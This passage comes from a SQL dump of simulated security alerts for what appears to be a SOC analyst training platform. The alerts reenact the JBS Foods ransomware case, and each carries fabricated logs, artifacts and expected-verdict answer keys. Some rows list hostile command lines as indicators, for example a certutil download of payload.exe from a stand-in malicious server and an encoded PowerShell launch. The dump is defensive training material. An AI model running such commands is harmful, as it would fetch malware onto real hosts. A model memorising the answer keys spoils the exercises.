'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.417Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:45:22Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"svc-network\\\",\\\"hostname\\\":\\\"NET-SERVER\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.417Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:45:22Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"svc-network\\\",\\\"hostname\\\":\\\"NET-SERVER\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.417Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:45:22Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"svc-network\\\",\\\"hostname\\\":\\\"NET-SERVER\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.417Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:45:22Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"svc-network\\\",\\\"hostname\\\":\\\"NET-SERVER\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.417Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:45:22Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"svc-network\\\",\\\"hostname\\\":\\\"NET-SERVER\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(770, 'C2 Communication Detected via Certutil', 'high', 'EDR', 'Detected suspicious network activity suggesting potential command-and-control communication using Certutil.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:32:08Z\",\"event_type\":\"process_execution\",\"src_ip\":\"172.16.0.10\",\"dst_ip\":\"203.0.113.100\",\"username\":\"maluser\",\"hostname\":\"INFECTED-HOST\",\"request_body\":\"\",\"command_line\":\"certutil.exe -urlcache -split -f http://maliciousserver.com/payload.exe\"}', '2026-01-11 17:29:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the organization\'s network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware distribution campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://maliciousserver.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Certutil used for downloading malicious payloads.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of Certutil to download a payload from a known malicious server indicates C2 activity.\"}', 'Advanced', 'EDR', 8, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(771, 'Initial Access via Phishing Email', 'medium', 'Email Security Gateway Logs', 'A phishing email was identified targeting JBS Foods\' employees with the objective to gain initial access to the network. The email contained a malicious attachment disguised as a financial report.', 'Social Engineering', 'T1566.001', 1, 'investigating', 74, '{\"timestamp\":\"2023-10-21T14:32:00Z\",\"email_id\":\"1234567890\",\"sender_email\":\"finance-dept@jbsfoods-fake.com\",\"recipient_email\":\"john.doe@jbsfoods.com\",\"subject\":\"Quarterly Financial Report\",\"attachment\":\"Q3_Report_2023.docm\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"malware_family\":\"Emotet\",\"action_taken\":\"Quarantined\"}', '2026-01-11 23:33:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing campaign origin IP.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Emotet malware hash.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"finance-dept@jbsfoods-fake.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Domain registered recently and used in phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-01T20:32:22.419Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(772, 'Ransomware Deployment and Execution', 'high', 'Endpoint Detection and Response (EDR) Alerts', 'Following initial access, the REvil ransomware was executed, leading to encryption of critical systems within JBS Foods\' network. This phase of the operation is crucial to disrupt and mitigate future incidents.', 'Malware Execution', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:30Z\",\"event_id\":\"1234567890\",\"event_type\":\"Ransomware Execution\",\"host_ip\":\"10.0.15.23\",\"attacker_ip\":\"185.92.220.45\",\"username\":\"jdoe\",\"process_name\":\"ransomware.exe\",\"process_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\ransomware.exe\",\"action\":\"File encryption started\",\"files_encrypted\":[\"C:\\\\Work\\\\finance.xlsx\",\"C:\\\\Work\\\\contracts.docx\",\"C:\\\\Work\\\\presentation.pptx\"]}', '2026-01-11 23:33:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with REvil ransomware operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Known hash for REvil ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint detection\",\"verdict\":\"malicious\",\"details\":\"Detected ransomware executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(773, 'Bitcoin Ransom Payment and Tracking - Transaction Analysis', 'medium', 'Blockchain Analysis Tools', 'After the ransomware attack on JBS Foods, a Bitcoin transaction was detected that corresponds to the ransom payment. Analysts will trace the transaction 3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1 and its association with known malicious activities. The objective is to explore how a portion of the funds was recovered by the FBI, emphasizing the role of financial forensics in cybercrime investigations.', 'Financial Transaction Tracing', 'T1589 - Gather Victim Identity Information', 1, 'new', NULL, '{\"transaction_id\":\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\",\"timestamp\":\"2023-09-14T15:32:10Z\",\"amount_btc\":11.5,\"source_wallet\":\"1JBSFoodWalletAddress\",\"destination_wallet\":\"1AttackerWalletAddress\",\"internal_ip\":\"192.168.1.105\",\"external_ip\":\"203.0.113.45\",\"associated_hashes\":[\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\",\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\"],\"filename\":\"RansomwarePayload.exe\",\"user\":\"jbs_admin\"}', '2026-01-11 23:33:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address linked to previous ransomware activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"RansomwarePayload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Cisco Talos\",\"verdict\":\"malicious\",\"details\":\"Identified as a ransomware payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.420Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\\\",\\\"timestamp\\\":\\\"2023-09-14T15:32:10Z\\\",\\\"amount_btc\\\":11.5,\\\"source_wallet\\\":\\\"1JBSFoodWalletAddress\\\",\\\"destination_wallet\\\":\\\"1AttackerWalletAddress\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"associated_hashes\\\":[\\\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\\\",\\\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\\\"],\\\"filename\\\":\\\"RansomwarePayload.exe\\\",\\\"user\\\":\\\"jbs_admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.420Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\\\",\\\"timestamp\\\":\\\"2023-09-14T15:32:10Z\\\",\\\"amount_btc\\\":11.5,\\\"source_wallet\\\":\\\"1JBSFoodWalletAddress\\\",\\\"destination_wallet\\\":\\\"1AttackerWalletAddress\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"associated_hashes\\\":[\\\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\\\",\\\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\\\"],\\\"filename\\\":\\\"RansomwarePayload.exe\\\",\\\"user\\\":\\\"jbs_admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.420Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\\\",\\\"timestamp\\\":\\\"2023-09-14T15:32:10Z\\\",\\\"amount_btc\\\":11.5,\\\"source_wallet\\\":\\\"1JBSFoodWalletAddress\\\",\\\"destination_wallet\\\":\\\"1AttackerWalletAddress\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"associated_hashes\\\":[\\\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\\\",\\\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\\\"],\\\"filename\\\":\\\"RansomwarePayload.exe\\\",\\\"user\\\":\\\"jbs_admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.420Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\\\",\\\"timestamp\\\":\\\"2023-09-14T15:32:10Z\\\",\\\"amount_btc\\\":11.5,\\\"source_wallet\\\":\\\"1JBSFoodWalletAddress\\\",\\\"destination_wallet\\\":\\\"1AttackerWalletAddress\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"associated_hashes\\\":[\\\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\\\",\\\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\\\"],\\\"filename\\\":\\\"RansomwarePayload.exe\\\",\\\"user\\\":\\\"jbs_admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.420Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\\\",\\\"timestamp\\\":\\\"2023-09-14T15:32:10Z\\\",\\\"amount_btc\\\":11.5,\\\"source_wallet\\\":\\\"1JBSFoodWalletAddress\\\",\\\"destination_wallet\\\":\\\"1AttackerWalletAddress\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"associated_hashes\\\":[\\\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\\\",\\\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\\\"],\\\"filename\\\":\\\"RansomwarePayload.exe\\\",\\\"user\\\":\\\"jbs_admin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(774, 'Initial Compromise via Phishing', 'high', 'Employee email system logs', 'A spear-phishing email was detected targeting JBS Foods employees. The email contained a malicious link designed to gain initial access to the network. The email was sent from a suspicious external IP address and included a known malicious attachment.', 'Phishing Attack', 'T1566.001 - Spearphishing Link', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"email_id\":\"1234567890\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.25\",\"sender_email\":\"attacker@evilmail.com\",\"recipient_email\":\"employee@jbsfoods.com\",\"subject\":\"Urgent: Action Required\",\"malicious_link\":\"http://malicious-link.com/securelogin\",\"attachment\":{\"filename\":\"Important_Document.pdf\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_action\":\"clicked_link\"}', '2026-01-11 23:35:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP used in previous attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/securelogin\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Phishing URL hosting credential theft page\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Associated with phishing campaign\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@evilmail.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Sender identified in multiple phishing incidents\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Compromise via Phishing\",\"date\":\"2026-02-01T20:32:22.421Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(775, 'Ransomware Deployment', 'critical', 'Endpoint detection and response (EDR) tools', 'Upon gaining access, the attackers executed the Sodinokibi ransomware, encrypting key systems to disrupt operations and increase the urgency of the ransom demand. The ransomware was executed on a critical server, leading to widespread encryption of important files.', 'Malware Execution', 'T1486: Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-21T15:43:21Z\",\"event_id\":\"EDR-123456\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"file_executed\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\sodinokibi.exe\",\"file_hash\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"process_id\":4567,\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\sodinokibi.exe -encrypt C:\\\\ImportantFiles\",\"file_size\":\"51200\",\"malicious\":true,\"detection_method\":\"behavioral\",\"severity\":\"Critical\"}', '2026-01-11 23:35:35', '2026-02-16 18:01:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware deployment campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical internal server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Sodinokibi ransomware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(776, 'Establishing Persistence', 'high', 'Network traffic analysis', 'The attackers set up persistence mechanisms using scheduled tasks and registry modifications, ensuring continuous access even after system reboots. Network traffic analysis revealed communication with a known malicious IP and the presence of a suspicious scheduled task and registry modification.', 'Persistence Mechanism', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:52:30Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"event\":\"scheduled_task_creation\",\"task_name\":\"UpdateScheduler\",\"task_path\":\"\\\\Microsoft\\\\Windows\\\\UpdateTasks\\\\\",\"registry_modification\":{\"key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"UpdateHelper\",\"value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\updatehelper.exe\\\"\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"compromised_user\",\"protocol\":\"HTTP\",\"request_url\":\"http://malicious-updates.com/check\"}', '2026-01-11 23:35:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP known to be associated with APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious payload\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"updatehelper.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unexpected executable found in system directory\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-updates.com/check\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Domain used for C2 communication in previous attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(777, 'Lateral Movement to Critical Systems', 'critical', 'Network segmentation logs', 'The attackers leveraged compromised credentials to move laterally, reaching critical systems that would amplify the impact of the encryption and pressure JBS Foods into payment.', 'Network Propagation', 'T1021.002 - SMB/Windows Admin Shares', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:25:37Z\",\"event_type\":\"network_access\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.45\",\"protocol\":\"SMB\",\"username\":\"jdoe\",\"action\":\"successful_login\",\"file_accessed\":\"confidential_financials.xlsx\",\"hash\":\"b2a5d6f7c3e9d1b7f4a8e3b9c1d7e7f9\",\"log_id\":\"evt-20231010142537\",\"description\":\"User jdoe successfully accessed critical file on 10.1.2.45 using compromised credentials.\"}', '2026-01-11 23:35:35', '2026-02-16 18:02:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Critical financial server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User 